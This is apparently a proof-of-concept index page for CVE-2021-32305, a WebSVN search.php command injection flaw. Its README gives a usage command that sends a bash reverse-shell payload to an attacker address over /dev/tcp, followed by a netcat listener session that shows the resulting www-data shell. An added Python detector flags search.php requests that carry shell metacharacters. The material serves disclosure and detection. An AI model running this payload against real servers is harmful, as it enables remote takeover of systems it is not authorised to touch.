CVE-2021-32305 PoC — WebSVN OS command injection vulnerability

Source
Associated Vulnerability
Title: WebSVN OS command injection vulnerability (CVE-2021-32305)
Description: WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter.
Description
This is an exploit for CVE-2021-32305, a command injection vulnerability in the search.php path; the exploit allows executing commands.
Readme
# CVE-2021-3205-websvn-2.6.0
This is an exploit for CVE-2021-32305, a command injection vulnerability in the search.php path; the exploit allows executing commands.
# Requirements
optparse, signal, requests
# Usage
```bash
❯ python3 CVE-2021-3205.py --url http://10.0.2.168/websvn/ --payload "bash -c 'bash -i >& /dev/tcp/10.0.2.133/443 0>&1'"

...

❯ nc -nlvp 443
listening on [any] 443 ...
connect to [10.0.2.133] from (UNKNOWN) [10.0.2.168] 34174
bash: cannot set terminal process group (357): Inappropriate ioctl for device
bash: no job control in this shell
www-data@agent:~/html/websvn$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@agent:~/html/websvn$
```
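An added detection example, not part of the repository above: it scans web-server access log lines for `search.php` requests whose search term contains shell metacharacters, which is the condition the CVE description names. The log lines, the `search` query parameter name and the metacharacter set are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Conservative set chosen for this example: characters a shell interprets
# and that an ordinary repository search term rarely needs.
SHELL_META = re.compile(r"""[;&|`$<>\\"'\n\r]""")

# Client address and request target from a combined-format access log line.
LOG_LINE = re.compile(r'^(?P<client>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')

SAMPLE_LOG = [  # constructed lines using documentation-range addresses
    '192.0.2.10 - - [01/Jun/2021:10:00:00 +0000] "GET /websvn/search.php?search=readme HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jun/2021:10:00:05 +0000] "GET /websvn/search.php?search=x%3B+id HTTP/1.1" 200 498',
    '198.51.100.7 - - [01/Jun/2021:10:00:09 +0000] "GET /websvn/search.php?search=%2524%2528id%2529 HTTP/1.1" 200 498',
    '192.0.2.10 - - [01/Jun/2021:10:00:12 +0000] "GET /websvn/listing.php?search=a%3Bb HTTP/1.1" 200 300',
]

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so double-encoded input is still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_search_requests(lines):
    """Return (client, decoded search value) for flagged search.php requests."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a parseable request line
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/search.php"):
            continue
        # Assumption: the term travels in a query parameter named "search".
        for raw in parse_qs(url.query, keep_blank_values=True).get("search", []):
            value = fully_decode(raw)
            if SHELL_META.search(value):
                hits.append((m.group("client"), value))
    return hits

if __name__ == "__main__":
    for client, value in suspicious_search_requests(SAMPLE_LOG):
        print(f"{client} search={value!r}")
```

A match is a lead for triage rather than proof of exploitation, and access logs do not record POST bodies. Per the description above, the issue affects WebSVN before 2.6.1.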
File Snapshot

```
[4.0K] /data/pocs/c0a36d725e66ba89f638e3e60f3b6e3e26dff1a5
├── [1.3K] CVE-2021-32305.py
└── [ 692] README.md

0 directories, 2 files
```